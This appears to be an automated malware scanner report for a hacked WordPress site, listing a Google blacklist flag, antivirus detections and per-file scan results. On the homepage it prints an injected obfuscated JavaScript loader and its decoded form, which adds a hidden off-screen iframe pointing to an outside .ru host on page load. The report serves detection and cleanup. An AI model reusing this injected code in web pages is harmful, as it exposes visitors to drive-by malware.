New scan:

Malware Scanner report for egis-tnet.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "egis-tnet.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=egis-tnet.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.egis-tnet.com/
200 OK
Content-Length: 19396
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{grebah++;}catch(hsens){try{sernbhsdfx|15232}catch(eryres){m=Math;if(m)f="flo"+"or";}
n="1428..1755..1540..1485..1624..1575..1554..1650..448..1530..1596..1635..910..1500..1400..600..574..480..1722..195..140..1770..1358..1710..448..1575..1428..1710..1526..480..854..480..1400..1665..1386..1755..1526..1515..1540..1740..644..1485..1596..1515..1358..1740..1414..1035..1512..1515..1526..1515..1540..1740..560..585..1470..1530..1596..1455..1526..1515..546..615..826..195..140..1575..1428..1710..152
... 816 bytes are skipped ...
.182..150..1400..1665..1386..1755..1526..1515..1540..1740..644..1470..1554..1500..1694..690..1358..1680..1568..1515..1540..1500..938..1560..1470..1620..1400..600..1470..1530..1596..1635..574..885..182..150..1750..885..182..150..1666..1575..1540..1500..1554..1785..644..1665..1540..1620..1554..1455..1400..480..854..480..1428..1710..1526..975..1400..1500..826".split("..");h=2;s="";if(m)for(i=0;i-279!=0;i=1+i){k=i;s+=String["fro"+"mCh"+"arCode"](n[k]/(i-h*Math[f](i/h)+016));}if(018-0xf===3)eval(s);}

Decoded script:


function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://unxajen.ru/count6.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://unxajen.ru/count6.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

Antivirus reports:

Avast
JS:Redirector-ZK [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BYF
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAME.SMRR
Emsisoft
Trojan.JS.Iframe.BYF (B)
Comodo
TrojWare.JS.iFrame.BRR
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.A
TrendMicro
JS_IFRAME.SMRR
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.BS
MicroWorld-eScan
Trojan.JS.Iframe.BYF
NANO-Antivirus
Trojan.Script.Iframe.vjblc
F-Secure
Trojan.JS.Iframe.BYF
F-Prot
JS/IFrame.QD
Norman
Iframe.PG
GData
Trojan.JS.Iframe.BYF
Commtouch
JS/IFrame.QD
BitDefender
Trojan.JS.Iframe.BYF

http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.jquery.js
200 OK
Content-Length: 54106
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.js
200 OK
Content-Length: 342
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93085
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/tinymce/tiny_mce.js?ver=3.6.1
200 OK
Content-Length: 231338
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/mce/tinybrowser/tb_tinymce.js.php?ver=3.6.1
200 OK
Content-Length: 1255
Content-Type: application/x-javascript
clean
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker.min.js?ver=3.6.1
200 OK
Content-Length: 36051
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker-en.js?ver=3.6.1
200 OK
Content-Length: 1127
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3
200 OK
Content-Length: 4289
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3
200 OK
Content-Length: 6488
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.3
200 OK
Content-Length: 2841
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js?ver=1.10.3
200 OK
Content-Length: 17273
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js?ver=1.10.3
200 OK
Content-Length: 18559
Content-Type: text/javascript
clean
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.3
200 OK
Content-Length: 7143
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: egis-tnet.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: egis-tnet.com
Referer: http://www.google.com/search?q=egis-tnet.com

Result:
The result is similar to the first query. There are no suspicious redirects found.